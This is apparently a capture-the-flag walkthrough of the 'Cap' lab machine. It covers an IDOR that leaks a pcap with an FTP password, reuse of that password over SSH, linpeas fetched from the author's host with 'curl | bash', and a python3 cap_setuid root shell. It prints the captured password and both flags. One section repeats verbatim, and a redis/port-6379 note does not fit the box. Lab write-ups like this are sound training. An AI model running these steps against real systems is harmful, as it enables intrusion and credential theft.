CAP

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sS -T4 10.129.161.225 -p- -oA 10.129.161.225.portsQuick
 PORT     STATE SERVICE       VERSION
 21/tcp   open  ftp
 22/tcp   open  ssh
 80/tcp   open  http
 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.161.225 -p 21,22,80
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
 |   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
 |_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
 80/tcp open  http    gunicorn
 |_http-server-header: gunicorn
 |_http-title: Security Dashboard
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 404 NOT FOUND
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:59 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Content-Length: 232
 |     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
 |     <title>404 Not Found</title>
 |     <h1>Not Found</h1>
 |     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
 |   GetRequest: 
 |     HTTP/1.0 200 OK
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:52 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Content-Length: 19386
 |     <!DOCTYPE html>
 |     <html class="no-js" lang="en">
 |     <head>
 |     <meta charset="utf-8">
 |     <meta http-equiv="x-ua-compatible" content="ie=edge">
 |     <title>Security Dashboard</title>
 |     <meta name="viewport" content="width=device-width, initial-scale=1">
 |     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
 |     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
 |     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
 |     <link rel="stylesheet" href="/static/css/themify-icons.css">
 |     <link rel="stylesheet" href="/static/css/metisMenu.css">
 |     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
 |     <link rel="stylesheet" href="/static/css/slicknav.min.css">
 |     <!-- amchar
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:52 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Allow: GET, HEAD, OPTIONS
 |     Content-Length: 0
 |   RTSPRequest: 
 |     HTTP/1.1 400 Bad Request
 |     Connection: close
 |     Content-Type: text/html
 |     Content-Length: 196
 |     <html>
 |     <head>
 |     <title>Bad Request</title>
 |     </head>
 |     <body>
 |     <h1><p>Bad Request</p></h1>
 |     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
 |     </body>
 |_    </html>
 

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln 10.129.161.225 -p 21,22,80
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh
 80/tcp open  http
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.161.225
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.161.225:80/
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/netstat
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/ip
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/data/1
 |     Form id: 
 |_    Form action: #
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 |_      http://ha.ckers.org/slowloris/


 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit the flag located in the nathan user's home directory.
//test anonymous login
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): anonymous
 331 Please specify the password.
 Password: 
 530 Login incorrect.
 ftp: Login failed
 ftp> exit
 221 Goodbye.
//walk the application
root@htb:~$ BROWSER > 10.129.161.225

 * identified the following
    - downloadable pcap files
       - pcap files may contain sensitive captured credentials
          - URL may be vulnerable to IDOR
             - http://10.129.161.225/data/3
    - ip configuration
    - network status
#download and analyze pcaps
root@htb:~$ BROWSER > 10.129.161.225/data/3
root@htb:~$ wireshark &
 File > Open > 2.pcap
 
 * nothing pertinent found
    - pcap 1 through 2 didn't have any data
 
root@htb:~$ BROWSER > 10.129.161.225/data/0

 * was able to access pcap 0 with significant data

root@htb:~$ wireshark &
 File > Open > 0.pcap
  34	2.626895	192.168.196.16	192.168.196.1	FTP	76	Response: 220 (vsFTPd 3.0.3)
  36	4.126500	192.168.196.1	192.168.196.16	FTP	69	Request: USER nathan
  38	4.126630	192.168.196.16	192.168.196.1	FTP	90	Response: 331 Please specify the password.
  40	5.424998	192.168.196.1	192.168.196.16	FTP	78	Request: PASS Buck3tH4TF0RM3!
  42	5.432387	192.168.196.16	192.168.196.1	FTP	79	Response: 230 Login successful.
  
//use the obtained credentials to log in to the FTP server
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): nathan
 331 Please specify the password.
 Password: 
 230 Login successful.
ftp> ls
 -r--------    1 1001     1001           33 Jul 27 23:12 user.txt
 226 Directory send OK.
ftp> more user.txt
 e65efcf0cda311aebd9a44e5d2d02138

Submit the flag located in root's home directory.
//test anonymous login
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): anonymous
 331 Please specify the password.
 Password: 
 530 Login incorrect.
 ftp: Login failed
 ftp> exit
 221 Goodbye.
//walk the application
root@htb:~$ BROWSER > 10.129.161.225

 * identified the following
    - downloadable pcap files
       - pcap files may contain sensitive captured credentials
          - URL may be vulnerable to IDOR
             - http://10.129.161.225/data/3
    - ip configuration
    - network status
#download and analyze pcaps
root@htb:~$ BROWSER > 10.129.161.225/data/3
root@htb:~$ wireshark &
 File > Open > 2.pcap
 
 * nothing pertinent found
    - pcap 1 through 2 didn't have any data
 
root@htb:~$ BROWSER > 10.129.161.225/data/0

 * was able to access pcap 0 with significant data

root@htb:~$ wireshark &
 File > Open > 0.pcap
  34	2.626895	192.168.196.16	192.168.196.1	FTP	76	Response: 220 (vsFTPd 3.0.3)
  36	4.126500	192.168.196.1	192.168.196.16	FTP	69	Request: USER nathan
  38	4.126630	192.168.196.16	192.168.196.1	FTP	90	Response: 331 Please specify the password.
  40	5.424998	192.168.196.1	192.168.196.16	FTP	78	Request: PASS Buck3tH4TF0RM3!
  42	5.432387	192.168.196.16	192.168.196.1	FTP	79	Response: 230 Login successful.
  
//use the obtained credentials to log in to the FTP server
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): nathan
 331 Please specify the password.
 Password: 
 230 Login successful.
ftp> ls
 -r--------    1 1001     1001           33 Jul 27 23:12 user.txt
 226 Directory send OK.
ftp> more user.txt
 e65efcf0cda311aebd9a44e5d2d02138
//test credentials against SSH
root@htb:~$ ssh nathan@10.129.161.225
 nathan:Buck3tH4TF0RM3!
 
nathan@cap:~$ sudo -l
 [sudo] password for nathan: 
 Sorry, user nathan may not run sudo on cap.
//escalate privileges
root@htb:~$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh
root@htb:~$ python3 -m http.server 8080
 ...
nathan@cap:~$ curl 10.10.14.4:8080/linpeas.sh | bash

 * the piped bash cmd immediately executes the downloaded linpeas.sh file on
   the target


 ╔══════════╣ Capabilities
 ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
 ══╣ Current shell capabilities
 ...
 Files with capabilities (limited to 50):
 /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

root@htb:~$ BROWSER > https://chatgpt.com/
  ╔══════════╣ Capabilities
  ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
  ══╣ Current shell capabilities
  ...
  Files with capabilities (limited to 50):
  /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
  /usr/bin/ping = cap_net_raw+ep
  /usr/bin/traceroute6.iputils = cap_net_raw+ep
  /usr/bin/mtr-packet = cap_net_raw+ep
  /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  
 * Linux capabilities break up root privileges into distinct 
   units (like cap_net_raw, cap_setuid, etc.), allowing non-root binaries to 
   perform specific privileged operations without full root access
    - privilege escalation is possible if a binary like python3 or perl has 
      a dangerous capability such as cap_setuid
   
nathan@cap:~$ which python3
 /usr/bin/python3
 
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
 uid=0(root) gid=1001(nathan) groups=1001(nathan)
# ls
 snap  user.txt
 
# ls /root
 root.txt  snap

# cat /root/root.txt
 09a7a10dc34ee7ca08fca767a8e8577a
